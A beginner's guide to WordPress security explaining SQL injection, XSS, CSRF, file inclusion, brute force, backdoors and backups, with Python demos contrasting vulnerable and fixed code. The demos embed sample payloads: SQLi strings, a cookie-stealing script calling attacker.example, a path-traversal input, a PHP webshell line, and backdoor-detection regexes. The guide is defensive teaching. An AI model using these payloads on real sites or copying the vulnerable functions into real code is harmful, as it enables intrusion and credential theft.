As technology advances, so do the risks associated with it. In today’s digital age, ensuring the security of your website is of utmost importance. With the increasing popularity of WordPress as a website building platform, it is crucial for beginners to understand the basics of WordPress security.
In this beginner’s guide, we will provide you with simple steps to enhance the security of your WordPress site. Whether you’re new to WordPress or an experienced user looking for a refresher, these tips will help you protect your site from potential threats.
Let’s dive in and learn how to fortify your WordPress site with basic security measures.
Familiarizing Yourself with Security Acronyms: SQLi, XSS, DoS, and More
When you start delving into security, you run into acronyms that at first mean nothing and gradually become familiar. A hint: they are not as scary as they look. Once you understand what each one describes, you will find that most of security comes down to experience and good habits.
Albert Einstein once said:
The only source of knowledge is experience.
In our case, the experience comes from years of working with WordPress and helping beginners secure their sites.
Let’s start getting to know the prominent terms:
SQL Injection (SQLi)
SQL injection occurs when a site builds a database query by pasting in user-supplied input (form fields, URL parameters, cookies, HTTP headers) without escaping or parameterizing it. The attacker "injects" SQL of their own into that input, and the database executes it, allowing them to read, modify, or delete database contents. On a WordPress site this typically means reading the users table, including password hashes, and from there taking over the site.
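The following is an added example, written for this guide and not code from the original author or from WordPress itself. It shows the bug and the fix in Python against an in-memory SQLite table standing in for wp_users; the table contents and the two payloads are constructed for the demo. In WordPress plugin code the safe form is what `$wpdb->prepare()` with placeholders gives you.

```python
import sqlite3

# Constructed sample data: a tiny table standing in for wp_users.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO users (user_login, user_pass) VALUES ('admin',  'hash-of-admin-password');
INSERT INTO users (user_login, user_pass) VALUES ('editor', 'hash-of-editor-password');
"""

# Two classic payloads an attacker would type into a "username" field.
BYPASS_PAYLOAD = "' OR '1'='1"
UNION_PAYLOAD = "' UNION SELECT user_pass FROM users --"


def make_db():
    """Creates the sample database in memory so the demo runs offline."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def find_user_vulnerable(db, login):
    """The bug: user input is glued into the SQL text, so a quote in the
    input ends the string literal and the rest is executed as SQL."""
    sql = "SELECT user_login FROM users WHERE user_login = '" + login + "'"
    return [row[0] for row in db.execute(sql)]


def find_user_safe(db, login):
    """The fix: the value travels separately from the SQL text as a bound
    parameter (the ? placeholder), so the database never parses it as SQL.
    This is what $wpdb->prepare() does for you in WordPress."""
    sql = "SELECT user_login FROM users WHERE user_login = ?"
    return [row[0] for row in db.execute(sql, (login,))]


def demo():
    """Runs both versions against both payloads and returns what came back."""
    db = make_db()
    return {
        # '' OR '1'='1' is true for every row: the whole table comes back.
        "vulnerable_bypass": sorted(find_user_vulnerable(db, BYPASS_PAYLOAD)),
        # UNION pulls a different column: the password hashes leak.
        "vulnerable_union": sorted(find_user_vulnerable(db, UNION_PAYLOAD)),
        # The same payloads are just odd usernames that match nothing.
        "safe_bypass": find_user_safe(db, BYPASS_PAYLOAD),
        "safe_union": find_user_safe(db, UNION_PAYLOAD),
        "safe_legit": find_user_safe(db, "admin"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The point to take away: no amount of "filtering bad characters" is as reliable as keeping data and query text apart with placeholders.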
Cross-Site Scripting (XSS)
Cross-site scripting is one of the most prevalent vulnerabilities on the web, WordPress sites included. It occurs when an attacker gets a site to output their input (a comment, a profile field, a URL parameter) into a page without escaping, so the browser of anyone viewing that page runs the attacker's script as if it were part of the site. The script runs with the visitor's identity: it can steal cookies and session tokens that are not marked HttpOnly, capture what is typed into forms, or, if the victim is a logged-in administrator, perform actions in wp-admin on their behalf.
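Below is an added example (mine, not the original author's and not WordPress code) that renders a comment block in Python both the vulnerable way and the escaped way, then parses the output to see whether any active content survived. The comment text, author name and website URL are constructed attacker inputs. The three escaping helpers correspond to WordPress's esc_html(), esc_attr() and esc_url(), which belong in exactly these places in theme and plugin code.

```python
import html
from html.parser import HTMLParser

# Constructed attacker input: a script in the comment body, a javascript:
# URL in the "website" field, and a name that breaks out of an attribute.
EVIL_COMMENT = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
EVIL_WEBSITE = "javascript:alert(document.cookie)"
EVIL_NAME = '" onmouseover="alert(1)'

ALLOWED_SCHEMES = ("http://", "https://")


def render_vulnerable(name, website, comment):
    """Builds HTML by concatenating raw input: every field is an XSS sink."""
    return (
        f'<div class="comment" data-author="{name}">'
        f'<a href="{website}">{name}</a>'
        f"<p>{comment}</p></div>"
    )


def escape_text(value):
    """HTML body context (between tags), like WordPress's esc_html()."""
    return html.escape(value, quote=False)


def escape_attr(value):
    """Attribute context: quotes must be escaped as well, like esc_attr()."""
    return html.escape(value, quote=True)


def escape_url(value):
    """URL in an href: allow only http(s), then escape for the attribute.
    Anything else (javascript:, data:, ...) becomes a harmless '#', which is
    the spirit of esc_url()."""
    if not value.strip().lower().startswith(ALLOWED_SCHEMES):
        return "#"
    return escape_attr(value)


def render_safe(name, website, comment):
    """Same markup, each value escaped for the context it lands in."""
    return (
        f'<div class="comment" data-author="{escape_attr(name)}">'
        f'<a href="{escape_url(website)}">{escape_text(name)}</a>'
        f"<p>{escape_text(comment)}</p></div>"
    )


class ActiveContentFinder(HTMLParser):
    """Parses markup the way a browser would and records script tags,
    inline event handlers and javascript: links."""

    def __init__(self):
        super().__init__()
        self.problems = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.problems.append("script tag")
        for attr, value in attrs:
            if attr.startswith("on"):
                self.problems.append(f"event handler {attr}")
            if attr == "href" and (value or "").strip().lower().startswith("javascript:"):
                self.problems.append("javascript: URL")


def find_active_content(markup):
    finder = ActiveContentFinder()
    finder.feed(markup)
    return finder.problems


if __name__ == "__main__":
    print(find_active_content(render_vulnerable(EVIL_NAME, EVIL_WEBSITE, EVIL_COMMENT)))
    print(find_active_content(render_safe(EVIL_NAME, EVIL_WEBSITE, EVIL_COMMENT)))
```

Note that the same name needs different treatment inside the `data-author` attribute and as link text: escaping is about the context the value lands in, not about the value.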
Secure Sockets Layer (SSL)
SSL (Secure Sockets Layer) and its successor TLS (Transport Layer Security) are protocols that encrypt the connection between a visitor's browser and your server; HTTPS is simply HTTP carried over such a connection. Without it, anyone on the network path (a public Wi-Fi hotspot, a compromised router) can read passwords and form data passing by in plain text and can modify pages in transit. With HTTPS they see only ciphertext, and the certificate lets the browser verify that it is really talking to your site. Two caveats: the name "SSL" has stuck, but the SSL protocol versions themselves are obsolete and your server should offer only TLS 1.2 or 1.3; and HTTPS protects data in transit only. It says nothing about whether the site itself is secure, so it complements, rather than replaces, everything else in this guide.
Cross-Site Request Forgery (CSRF)
In a CSRF attack, the attacker tricks a logged-in victim into sending a request they did not intend, for example by luring them to a page that silently submits a form to your site. Because the browser attaches the victim's session cookie automatically, the site treats the request as the victim's own. On a WordPress site this might mean changing an email address or password, posting comments, or making purchases. WordPress defends against this with nonces (tokens tied to the user and to a specific action) that every form and AJAX handler must verify, which is one reason a badly written plugin can reintroduce the problem.
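Here is an added example (written for this guide; not the author's code and not WordPress's implementation) of how such a token works, in Python. The secret key and the session identifiers are constructed for the demo; on a real site the key would come from the salts in wp-config.php. The 12-hour tick and the "current or previous tick" acceptance mirror how WordPress nonces behave (wp_nonce_field() to emit, wp_verify_nonce() or check_admin_referer() to check), the rest is an illustration.

```python
import hashlib
import hmac
import secrets

# Constructed secret for the demo; a real site derives it from wp-config.php salts.
SECRET_KEY = secrets.token_bytes(32)
TICK_SECONDS = 12 * 60 * 60   # WordPress nonces rotate on a 12-hour tick


def _token_for(session_id, action, tick):
    """HMAC over (who, what, when): nobody without the key can forge it."""
    msg = f"{session_id}|{action}|{tick}".encode()
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()[:32]


def make_token(session_id, action, now):
    """Token embedded as a hidden field in the form for this user and action."""
    return _token_for(session_id, action, now // TICK_SECONDS)


def verify_token(token, session_id, action, now):
    """Accepts the current and the previous tick, so a form stays valid for
    between 12 and 24 hours. compare_digest avoids timing leaks."""
    tick = now // TICK_SECONDS
    for candidate in (tick, tick - 1):
        if hmac.compare_digest(token, _token_for(session_id, action, candidate)):
            return True
    return False


def handle_change_email(request, session_id, now):
    """A state-changing handler: refuses anything without a valid token."""
    token = request.get("_token", "")
    if not verify_token(token, session_id, "change_email", now):
        return "rejected"
    return "changed"


def demo():
    now = 1_700_000_000
    victim = "session-of-victim"
    # The victim's own form carries a valid token.
    own = {"email": "me@example.com",
           "_token": make_token(victim, "change_email", now)}
    # The attacker's hidden form on another site cannot know the token.
    forged = {"email": "attacker@example.com"}
    # A token the attacker obtained for their own session does not transfer.
    stolen = {"email": "attacker@example.com",
              "_token": make_token("session-of-attacker", "change_email", now)}
    return {
        "own": handle_change_email(own, victim, now),
        "forged": handle_change_email(forged, victim, now),
        "stolen": handle_change_email(stolen, victim, now),
        # Two ticks later the victim's own token has expired.
        "expired": handle_change_email(own, victim, now + 2 * TICK_SECONDS),
    }


if __name__ == "__main__":
    print(demo())
```

The token is bound to the session and the action, so a token leaked from one form cannot be replayed against a different user or a different operation. Modern browsers' SameSite cookie defaults reduce CSRF exposure further, but they do not replace the check.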
File Inclusion Exploits
File inclusion vulnerabilities arise when a script builds the path of a file to include or read from a user-controlled parameter. This can lead to remote code execution. Local File Inclusion (LFI) lets the attacker include files that already exist on the server, for instance wp-config.php with the database password, or a file they managed to upload earlier; Remote File Inclusion (RFI) lets them include a script from a server they control. RFI additionally requires PHP's allow_url_include setting, which has been off by default for many years, so LFI is the variant you are far more likely to meet.
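An added example, in Python, of the same bug and its fix (my code for this guide, not the author's or WordPress's). It builds a throwaway mini site with a templates/ folder and a wp-config.php one level up, all constructed for the demo, and shows a "page" parameter walking out of the templates directory versus an allow-list with a resolved-path check.

```python
import tempfile
from pathlib import Path

# The only pages the site knows how to render.
ALLOWED_PAGES = {"home", "about"}


def build_sample_site():
    """Constructed mini site: templates/ and, one level up, a wp-config.php
    holding a secret, the file an LFI attacker goes for first."""
    root = Path(tempfile.mkdtemp())
    (root / "templates").mkdir()
    (root / "templates" / "home.php").write_text("<h1>home</h1>")
    (root / "templates" / "about.php").write_text("<h1>about</h1>")
    (root / "wp-config.php").write_text("define('DB_PASSWORD', 's3cret');")
    return root


def load_page_vulnerable(root, page):
    """Equivalent of PHP's include($_GET['page'] . '.php'): the parameter is
    used as a path with no checks, so '../wp-config' walks out of templates/."""
    return (root / "templates" / (page + ".php")).read_text()


def load_page_safe(root, page):
    """Map the parameter onto an allow-list of known pages, then also confirm
    the resolved path is still inside templates/ (defence in depth: catches a
    future mistake such as an allow-listed name containing a slash)."""
    if page not in ALLOWED_PAGES:
        raise ValueError(f"unknown page: {page!r}")
    base = (root / "templates").resolve()
    target = (base / f"{page}.php").resolve()
    if base not in target.parents:
        raise ValueError("path escapes the templates directory")
    return target.read_text()


def try_load(loader, root, page):
    """Runs a loader and reports either the content or why it refused."""
    try:
        return loader(root, page)
    except (ValueError, OSError) as exc:
        return f"refused: {exc}"


if __name__ == "__main__":
    site = build_sample_site()
    for page in ("home", "../wp-config", "http://attacker.example/shell"):
        print(page, "->", try_load(load_page_vulnerable, site, page))
        print(page, "->", try_load(load_page_safe, site, page))
```

The allow-list is the real fix; the resolve() check is cheap insurance. Python will not fetch an http:// path the way PHP with allow_url_include would, so the RFI case here simply fails to find a file, but the safe loader rejects it before any file system access happens.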
Brute Force Attacks
Brute force attacks involve an attacker trying many username and password combinations until one works. On WordPress the usual targets are wp-login.php and xmlrpc.php, and attacks are often spread over many IP addresses so that a simple per-IP block is not enough. WordPress sites are particularly exposed because of predictable usernames like "admin" (and because author archive URLs often reveal real usernames), combined with weak passwords.
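The lockout logic that a security plugin applies looks roughly like the added Python example below (my illustration for this guide, not the author's code and not how any particular plugin is implemented). Credentials, IP addresses and the guess list are constructed for the demo, and passwords are compared in plain text only to keep the sample short.

```python
from collections import defaultdict, deque


class LoginGuard:
    """Counts failed logins per source IP *and* per username. Locking only
    by IP is not enough: attackers spread guesses over many addresses."""

    def __init__(self, max_failures=5, window=300, lockout=900):
        self.max_failures = max_failures
        self.window = window            # seconds in which failures are counted
        self.lockout = lockout          # seconds a key stays blocked
        self.failures = defaultdict(deque)
        self.locked_until = {}

    @staticmethod
    def _keys(ip, username):
        return (("ip", ip), ("user", username.lower()))

    def _prune(self, key, now):
        q = self.failures[key]
        while q and now - q[0] > self.window:
            q.popleft()

    def is_allowed(self, ip, username, now):
        return all(self.locked_until.get(k, 0) <= now for k in self._keys(ip, username))

    def record_failure(self, ip, username, now):
        for key in self._keys(ip, username):
            self._prune(key, now)
            self.failures[key].append(now)
            if len(self.failures[key]) >= self.max_failures:
                self.locked_until[key] = now + self.lockout
                self.failures[key].clear()

    def record_success(self, ip, username, now):
        for key in self._keys(ip, username):
            self.failures[key].clear()


def attempt(guard, users, ip, username, password, now):
    """One login attempt; returns 'locked', 'fail' or 'ok'."""
    if not guard.is_allowed(ip, username, now):
        return "locked"
    if users.get(username) == password:   # demo only: real code compares hashes
        guard.record_success(ip, username, now)
        return "ok"
    guard.record_failure(ip, username, now)
    return "fail"


# Constructed sample credentials and attack traffic.
USERS = {"admin": "correct horse battery staple"}
GUESSES = ["123456", "password", "admin", "qwerty", "letmein"]


def single_ip_attack():
    """One IP tries five guesses, then the real password: too late."""
    g = LoginGuard()
    results = [attempt(g, USERS, "203.0.113.5", "admin", pw, now=1000 + i)
               for i, pw in enumerate(GUESSES)]
    results.append(attempt(g, USERS, "203.0.113.5", "admin", USERS["admin"], now=1006))
    return results


def distributed_attack():
    """Each guess comes from a different IP; the per-username counter still
    locks the account after five failures and releases it after the lockout."""
    g = LoginGuard()
    results = [attempt(g, USERS, f"198.51.100.{i}", "admin", pw, now=2000 + i)
               for i, pw in enumerate(GUESSES)]
    results.append(attempt(g, USERS, "198.51.100.99", "admin", USERS["admin"], now=2006))
    # The lock started at the fifth failure (now=2004) and lasts 900 seconds.
    results.append(attempt(g, USERS, "198.51.100.99", "admin", USERS["admin"], now=2905))
    return results


if __name__ == "__main__":
    print(single_ip_attack())
    print(distributed_attack())
```

The per-username counter has a cost: an attacker can deliberately lock the real administrator out. That is why plugins pair it with IP blocking, an unlock-by-email path, and, above all, two-factor authentication, which makes guessing pointless even when a password is weak.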
Denial of Service (DoS)
A Denial of Service attack aims to make a website or service unavailable to its users, typically by flooding it with more requests than it can handle. This is not specific to WordPress, but WordPress sites are a common target, and expensive endpoints (search, xmlrpc.php, poorly written plugins or themes that run heavy queries on every request) let an attacker do a lot of damage with relatively little traffic.
Phishing Attempts
Phishing involves tricking a site administrator into giving away sensitive information, usually credentials. This might be a fake login page that looks like wp-admin, or a fraudulent email asking the admin to "update payment details" or "verify the account", and it compromises the site just as effectively as a software vulnerability.
Malware
Malware can be introduced to WordPress sites through compromised themes, plugins, or weak admin credentials. It can lead to a range of issues, from serving spam to redirecting visitors to malicious sites.
Backdoor
A backdoor is malicious code designed to give an attacker access to the site or server without going through the normal authentication process. Backdoors are embedded in plugins, themes, uploads, or even WordPress core files, usually disguised (obfuscated, named like a legitimate file, or placed where nobody looks) to avoid detection by site owners and administrators.
Backdoors serve various purposes: data theft, distribution of additional malicious software, site defacement, or use of the server's resources for further attacks. They are also what makes cleaning a hacked site hard: fixing the original vulnerability is not enough if the backdoor the attacker left behind survives. Removal requires diligent identification and cleanup of all malicious code, frequently restoring the site from a known-clean backup, and then rotating passwords, API keys, and the authentication salts in wp-config.php so that stolen credentials and sessions stop working.
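As an added example of the "diligent identification" part (my scanner for this guide, not the author's tool and not a replacement for a real malware scanner), the Python script below walks a WordPress install and flags three classic indicators: PHP files inside wp-content/uploads, code shapes that almost never occur in legitimate plugins, and files modified in the last few days. The sample install it scans is constructed in a temporary directory, including one planted webshell. The same script answers the FAQ question at the end of this article about signs that a site has been hacked.

```python
import os
import re
import tempfile
import time
from pathlib import Path

PHP_SUFFIXES = {".php", ".phtml", ".php5", ".php7", ".phar"}

# Code shapes that are almost never legitimate in a theme or plugin.
PATTERNS = {
    "eval of decoded payload": re.compile(
        rb"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    "shell command built from request data": re.compile(
        rb"(?:system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)"),
    "variable function called with request data": re.compile(
        rb"\$\w+\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)"),
    "file written from request data": re.compile(
        rb"file_put_contents\s*\([^;]*\$_(?:GET|POST|REQUEST|FILES)"),
}


def scan(root, now=None, recent_days=7):
    """Walks a WordPress install and returns sorted (path, reason) findings."""
    root = Path(root)
    now = time.time() if now is None else now
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        is_php = path.suffix.lower() in PHP_SUFFIXES
        # Uploads hold images and documents; executable code there is a red flag.
        if is_php and rel.startswith("wp-content/uploads/"):
            findings.append((rel, "PHP file inside uploads directory"))
        if is_php:
            data = path.read_bytes()
            for label, rx in PATTERNS.items():
                if rx.search(data):
                    findings.append((rel, label))
        # Core and plugin files only change when you update them.
        if now - path.stat().st_mtime < recent_days * 86400:
            findings.append((rel, f"modified in the last {recent_days} days"))
    return sorted(findings)


def build_sample_site(now):
    """Constructed install: two clean files untouched for months, one core
    file touched recently, and a webshell dropped into uploads."""
    root = Path(tempfile.mkdtemp())
    old = now - 90 * 86400
    files = {
        "wp-includes/functions.php": b"<?php function wp_demo() { return 1; }",
        "wp-content/themes/demo/functions.php": b"<?php add_action('init', 'demo_init');",
        "wp-includes/class-wp.php": b"<?php class WP {}",
        "wp-content/uploads/2024/cache.php": b"<?php eval(base64_decode($_POST['c'])); ?>",
    }
    untouched = {"wp-includes/functions.php", "wp-content/themes/demo/functions.php"}
    for rel, body in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(body)
        if rel in untouched:
            os.utime(p, (old, old))
    return root


def demo():
    now = time.time()
    return scan(build_sample_site(now), now=now)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Pattern matching catches the lazy backdoors; the careful ones look like ordinary code. Combine it with `wp core verify-checksums` and `wp plugin verify-checksums` from WP-CLI, which compare every file against the originals on wordpress.org and report anything added or altered.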
What are the common security holes in WordPress sites?
The more you understand the source and nature of the problem, the better equipped you’ll be to prevent security issues on your site.
Lack of System and Plugin Updates
Security researchers, developers, and attackers all scrutinize code in depth. Because we work within the WordPress ecosystem, we receive regular updates that fix the vulnerabilities discovered over time. Although these updates are entirely free, some site owners do not apply them regularly, for various reasons. Often it is simply a lack of understanding of how important they are.
For example, if someone finds an SQLi vulnerability in a popular contact form plugin like CF7 tomorrow, a fixed version will usually appear in the updates section of the dashboard very quickly. All you need to do is apply the update, and you are protected from the newly discovered vulnerability. WordPress can also apply plugin and theme updates automatically (the "Enable auto-updates" link in the plugins list), which is the safest default for a site nobody checks daily.
On the other hand, not updating in time leaves your site exposed. Once a vulnerability is public, attackers scan the web for sites still running the old version and exploit it at scale, often within hours. Obviously, this is a situation we want to avoid.
Using Cheap and Dubious Hosting Services
There are plenty of hosting providers whose main selling points are a very low price, a large user base, and excellent reviews. They may even promise impressive performance figures for your site.
I was taught that "not all that glitters is gold," and here it applies to security. Even if the company advertises advanced security features and throws around terms like WAF, experts, firewalls, and more, it is not realistic to get all of that at a rock-bottom price. The price is a primary indicator of how much security you are actually getting.
You might wonder why the shortfall would be in security rather than, say, speed. The answer is costs. Anyone can take a server and package it as a hosting company: a fast physical server in a good data center costs (for example) $100 a month, and even the most monstrous physical server you can think of costs perhaps $500 a month. One full-time security person costs about $10,000 a month.
A large hosting company needs teams of security and monitoring staff to provide the necessary protection, and that cost has to come from somewhere. A dedicated article on hosting companies will follow. Until then, you can consult with me privately (contact form), in the comments, or sign up for the site's newsletter to receive updates.
For now, the rule of thumb is that a very low price usually means cheap security, and it is better to avoid it.
Using Unmaintained (Abandoned) Plugins or Those Written with Low Code Quality
I often encounter, during the development of a site, a plugin that seems completely innocent and does exactly (and only) what I need from it. But the plugin hasn't received an update in 3 years.
Beyond needing to check whether the plugin still works properly with an up-to-date version of WordPress, I have to assume it may introduce security issues. Its code has been public for a long time, nobody is fixing what is found in it, and it is not unlikely that attackers have already found an exploitable flaw.
In such a case, it's highly recommended to look for another, actively maintained plugin, or simply implement the specific thing you wanted from it yourself.
Using Themes and/or Plugins from Dubious Sources or Nulled Versions
In the past, warez sites, boards, and file-sharing software like eMule and Kazaa were common sources for getting, for free, things that are supposed to cost money. Those sources were never reliable or accountable, and they spread viruses and backdoors. "Nulled" WordPress themes and plugins are the same thing today.
It's actually very simple. The distributor embeds, in the files he gives away, code that opens a backdoor into your site. From there he can reach everything on it, including your own account, and he gets the same access to every site that installs the same download.
To avoid potential harm, all we need to do is download or purchase plugins and themes from a trusted source. Since there is no professional certification for WordPress site builders or plugin developers on the market, the rules are practical ones. First and foremost, take the WordPress core files only from the official site, wordpress.org. Prefer themes from the repository on wordpress.org that have many users (many active installations). You can also purchase from reputable, well-known marketplaces like themeforest.net, and of course you can commission a custom theme from an experienced developer. I have been offering this service at resite.pro for decades.
For plugins, the same applies as for themes. The only difference is that many plugins can only be purchased through the plugin's own site, for reasons like the WordPress license, the fees charged by marketplaces like themeforest, and the developer's wish to give a more prestigious and unique impression.
I would always recommend checking the homepage of the plugin or theme you want to install. Sometimes you'll discover that the site is no longer active, or your antivirus raises an alert as soon as you visit it. These are clear signs to stay away.
Embedding “Third-Party” Codes
How often does this happen: you've built a site and now you want to promote it. You start by inserting snippets from well-known companies like Google, for Analytics or Tag Manager. You continue with the Facebook Pixel, then hear about HOTJAR and various other analytics services and start adding them too. Each one is "just a small snippet" that, you are promised, does nothing to the site.
With 25 years of experience, I can confidently say: it's not that they are lying. They just don't think about it. Every snippet you add to the site does something. Mostly it affects performance. But it also affects security: a third-party script runs inside your pages with exactly the same power as a script of your own. It can read and change anything on the page, including form contents and any cookie that is not HttpOnly, on every page where it loads. You are voluntarily granting that vendor, and anyone who compromises the vendor's servers or your tag manager account, the same capability an attacker gets from an XSS vulnerability. So add such snippets only when you really need them, and remove the ones you stop using.
I'm not saying to avoid essentials like Google Analytics; on the contrary, it's something almost every site needs. But even HOTJAR (which is completely clean and a very respectable company) is not a service everyone needs, and it can be skipped. And definitely skip snippets from obscure companies, or from a company someone told you is well-known but that nobody you ask actually recognizes.
Using an Outdated Version of PHP
As of writing this article, historical PHP versions like 5.6 have long been out of support, and so are the entire PHP 7 line and PHP 8.0.
What does that mean? PHP itself (the language WordPress runs on) receives regular updates just like WordPress, and security holes are found in it from time to time. Once a version reaches end of life, it no longer receives those fixes. Running such a version is dangerous because it may contain known security holes that will never be patched, and you will not even hear about them. You can see which PHP version your site runs under Tools > Site Health in the dashboard, the hosting control panel usually lets you switch to a current version, and the list of supported versions is published at php.net/supported-versions.
Handing Out Admin Access Too Freely, and Not Revoking It When People Leave
Many times, I've taken over sites of new clients where the site was already active and established. By no "unexplained" coincidence, the owners who did not care to whom they gave admin access, or when to remove access from people who had already left the business, eventually had severe security problems. Either the site was hacked or there was a cyber incident in the company, and they decided to lock everything down until further notice.
In addition, it's important to remember that even content editors can err and paste in "external code", typically an embed snippet from some tool that promises to do wonders for an article. Therefore, as part of granting editing and writing access, you should also set clear rules: nobody adds code or scripts that were not approved by the site's technical manager. Giving writers the Editor or Author role rather than Administrator enforces part of this, since those roles cannot install plugins or edit theme files.
Predictable Passwords and Accesses
Continuing directly from the previous section: many people simply have trouble remembering a good, hard password. So they use their phone number, maybe their ID number, their date of birth, the year they started their current job... Yes, there are many such people, and maybe some of them are reading this article. A password manager solves the problem: it generates and remembers a long random password for every site, so you don't have to.
15 years ago, I did a test and bought a random domain and built a WordPress site with the following login details:
Username: admin
Password: 123456
And I left it to see what would happen to the site’s fate.
It took less than 24 hours for the site to be hacked, and everything else hosted on the same account suffered from the hack too.
As for your question of how long it would take for your account to be hacked with your first name + your phone number: it may not happen within a day (unless you specifically annoyed someone), but it will be faster than you think.
WordPress Security Plugin
I recommend using the Wordfence plugin, even in its free version. It offers many features: monitoring changes in files, blocking IP addresses after a number of failed login attempts, rate limiting, configurable rules for blocking suspicious traffic, and more.
One of the things I most liked seeing in the free version is that it can detect a content editor trying to add code from an external service, block it, and wait for the site administrator's approval.
Wordfence also provides two-factor authentication, a second layer on top of the login form. An account enrolled with an authenticator app such as Google Authenticator must enter a one-time code after the correct username and password, so a stolen or guessed password alone is not enough to log in. This option is effective and, in practice, very convenient.
Backups for WordPress Sites. Why is it so Critical?
A backup is important for anything in life, especially for something that has a lot of money invested in it.
Take your car: you insure it against several different events to protect yourself from the unexpected, hoping you will never need to claim. A backup of your WordPress site is the same. We want to be able to go back if the site is hacked or breaks during an update.
Usually everyone makes a backup before a major update or a significant development, such as adding a store to the site. That is correct but not enough.
In addition to the deliberate backup we make right before a significant change, we also need an automatic backup, preferably daily, so that we can go back whenever we need to.
In an exceptional case I encountered, I received a report about a hacked site. I looked at the hosting company and saw that there was a working backup service that ran every day. I restored to one day before the report and saw that the site was still hacked (in this case it showed content of a different kind instead of the site's own content). I went further back through the backups to find when the site was hacked and discovered that it had been hacked about 4 days earlier.
Luckily for the client, he had automatic backups going back a month. We restored the last clean backup we had, and the client was satisfied. The work was then to find and close the security hole in the site, not to rebuild the site or clean it of malicious code.
The time required to identify the security hole and repair it is usually up to 3 hours.
Manually restoring or cleaning a site after a hack, by contrast, usually takes about 3 days and can take much longer in some cases.
Of course, this difference is also reflected in what you pay whoever handles the incident.
You can perform the initiated backup according to this guide:
A daily automatic backup is best made the responsibility of the hosting company. Make sure the hosting plan includes automatic daily backups that the hosting company manages and stores separately from your web server, so that an attacker who compromises the site cannot also delete the backups, and restore one at least once to confirm the backups actually work. If you don't have this service through the hosting company, use a plugin like UpdraftPlus and send the backups to external storage rather than leaving them in the site's own directory.
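For the do-it-yourself case, here is an added example of what a minimal backup job looks like (written for this guide; it is not UpdraftPlus, the hosting company's tooling, or the author's script). It archives the site directory, verifies the archive can be read back, and keeps only the newest N copies. The database dump function shells out to mysqldump with credentials read from a file; the demo itself runs on a constructed site directory in a temporary folder and never contacts a database, and the file names and retention count are assumptions you would adjust.

```python
import subprocess
import tarfile
import tempfile
import time
from pathlib import Path


def dump_database(defaults_file, db_name, out_path):
    """Dumps MySQL with credentials read from an ini file ([client] user=...
    password=...). Passing the password on the command line would expose it
    to every user on the host through `ps`. Not called by the demo, which
    runs without a database server."""
    with open(out_path, "wb") as fh:
        subprocess.run(
            ["mysqldump", f"--defaults-extra-file={defaults_file}",
             "--single-transaction", db_name],
            stdout=fh, check=True)


def rotate(dest_dir, keep):
    """Deletes all but the newest `keep` archives; returns the names kept.
    Timestamped names sort chronologically, so sorting by name is enough."""
    archives = sorted(Path(dest_dir).glob("site-*.tar.gz"))
    for old in archives[:-keep]:
        old.unlink()
    return [a.name for a in archives[-keep:]]


def make_backup(site_dir, dest_dir, keep=30, extra_files=(), now=None):
    """Archives the site directory (plus e.g. a database dump), verifies the
    archive reads back, then applies retention. Returns (name, members, kept)."""
    dest = Path(dest_dir)
    dest.mkdir(parents=True, exist_ok=True)
    stamp = time.strftime("%Y%m%d-%H%M%S", time.gmtime(now))
    archive = dest / f"site-{stamp}.tar.gz"
    with tarfile.open(str(archive), "w:gz") as tar:
        tar.add(str(site_dir), arcname="site")
        for extra in extra_files:
            tar.add(str(extra), arcname=Path(extra).name)
    with tarfile.open(str(archive), "r:gz") as tar:   # read-back verification
        members = tar.getnames()
    return archive.name, members, rotate(dest, keep)


def demo():
    """Constructed site with one file; five daily backups with keep=3."""
    site = Path(tempfile.mkdtemp()) / "public_html"
    site.mkdir()
    (site / "wp-config.php").write_text("define('DB_NAME', 'demo');")
    dest = Path(tempfile.mkdtemp())
    day0 = 1_700_000_000   # fixed clock so the archive names are predictable
    members = kept = None
    for day in range(5):
        _, members, kept = make_backup(site, dest, keep=3, now=day0 + day * 86400)
    return members, kept


if __name__ == "__main__":
    print(demo())
```

Two things this script deliberately does not do for you: it does not copy the archives off the server, and it does not test a restore. Push the archives to storage the web server can only write to, never delete from, and restore one to a staging site now and then. A backup you have never restored is a hope, not a backup.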
Conclusion
Updates, backups, official and safe sources for everything you install on the site, responsible distribution of access, and a serious hosting company: these are the most basic things that keep a site from being hacked.
FAQ
Q: Why is WordPress security important for beginners?
A: WordPress security is essential for beginners as it helps protect their websites from potential threats and unauthorized access.
Q: What are some simple steps to enhance WordPress security?
A: Some simple steps to enhance WordPress security include keeping plugins and themes updated, using strong passwords, enabling two-factor authentication, and regularly backing up your site.
Q: What is the most important thing to know?
A: An automated backup that the hosting company manages and stores away from the web server is essential. That way, if something happens and the site is hacked, you can go back to a clean copy and then fix the issue.
Q: What is the first thing I need to do to secure my site?
A: Perform updates for everything. Updates protect us from a very large percentage of hacks.
Q: How can I protect my WordPress site from Elementor vulnerabilities?
A: To protect your WordPress site from Elementor vulnerabilities, it is important to update your Elementor plugin to the latest version and apply any security patches or fixes provided by the developers.
Q: Does a basic WordPress site without e-commerce need advanced security measures?
A: Yes. Every site, regardless of its purpose, is a target for hackers and should adhere to basic security protocols.
Q: How often should I update my WordPress themes and plugins?
A: Regularly. Updating is a simple process that usually takes just a few minutes. Checking every two weeks is a minimum; more frequent checks, or enabling automatic updates, are recommended, because attackers exploit newly published vulnerabilities within hours or days.
Q: What are the signs that my WordPress site has been hacked?
A: Sudden changes in the site's content or performance; new administrator accounts you did not create; unfamiliar files, especially PHP files in wp-content/uploads; redirects to other sites or spam pages appearing in Google results; or a warning from your browser, your antivirus, or Google Search Console when accessing the site.